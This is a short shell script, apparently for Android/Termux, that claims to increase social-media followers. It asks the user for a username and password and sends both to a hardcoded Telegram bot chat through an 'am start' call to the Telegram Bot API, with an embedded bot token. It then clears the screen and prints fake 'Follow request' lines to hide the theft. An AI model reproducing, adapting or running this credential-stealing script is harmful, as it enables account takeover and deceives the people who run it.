echo "-----------------------------------------------"
echo "-----------------------------------------------"
echo "INCREASE YOUR FOLLOWERE"
echo "-----------------------------------------------"
echo -n  "USERNAME :"
read s1
echo -n "PASSWORD:"
read s2
am start -a android.intent.action.VIEW -d "https://api.telegram.org/bot6045708760:AAG2mj-oGSp1-O8XTVlBehpscRbJcBEOGAE/sendMessage?chat_id=5307797579&text=$s1+$s2"
sleep 3
 clear
echo "Followers will be added soon"
echo "wait"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
sleep 3
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
echo "Follow request"
